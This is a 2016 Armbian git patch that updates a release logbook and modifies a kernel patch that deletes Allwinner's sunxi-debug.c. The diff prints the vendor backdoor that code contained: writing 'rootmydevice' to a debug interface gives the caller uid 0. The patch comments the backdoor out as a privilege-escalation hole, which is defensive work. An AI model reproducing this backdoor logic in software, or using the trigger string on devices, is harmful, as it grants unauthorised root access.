From d45ad4af793b2c21920ea8299bf0364d9eab7fea Mon Sep 17 00:00:00 2001 From: Igor Pecovnik Date: Sun, 5 Jun 2016 08:42:25 +0200 Subject: [PATCH] Patch update due to merge, logbook - updated some images --- documentation/logbook.md | 4 ++-- patch/kernel/sun8i-default/remove-sunxi-debug.patch | 13 +++++++++++-- 2 files changed, 13 insertions(+), 4 deletions(-) diff --git a/documentation/logbook.md b/documentation/logbook.md index d836111344..cdb09dd6f8 100644 --- a/documentation/logbook.md +++ b/documentation/logbook.md @@ -1,7 +1,7 @@ # Release history -**v5.14 / 1.6.2016** - +**v5.14 / 5.6.2016** +- Odroid C2 and Banana M2+ images rebuilt - fixed eMMC installer, updated images and repository for Opi PC Plus and Opi Plus 2E **v5.12 / 31.5.2016** diff --git a/patch/kernel/sun8i-default/remove-sunxi-debug.patch b/patch/kernel/sun8i-default/remove-sunxi-debug.patch index 9285edd660..6b0566f8a7 100644 --- a/patch/kernel/sun8i-default/remove-sunxi-debug.patch +++ b/patch/kernel/sun8i-default/remove-sunxi-debug.patch @@ -16,7 +16,7 @@ deleted file mode 100755 index 53ed9fc..0000000 --- a/arch/arm/mach-sunxi/sunxi-debug.c +++ /dev/null -@@ -1,94 +0,0 @@ +@@ -1,103 +0,0 @@ -/* - * Sunxi_debug.c - * @@ -56,7 +56,15 @@ index 53ed9fc..0000000 - kfree(buf); - return -EFAULT; - } -- +- +- /* +- +- COMMENTED! THIS CODE ALLOWS FOR PRIVILEGE ESCALATION! +- +- http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/ +- +- Note: This entire file should probably be removed +- - if(!strncmp("rootmydevice",(char*)buf,12)){ - cred = (struct cred *)__task_cred(current); - cred->uid = 0; @@ -69,6 +77,7 @@ index 53ed9fc..0000000 - cred->fsgid = 0; - printk("now you are root\n"); - } +- */ - - kfree(buf); - return count;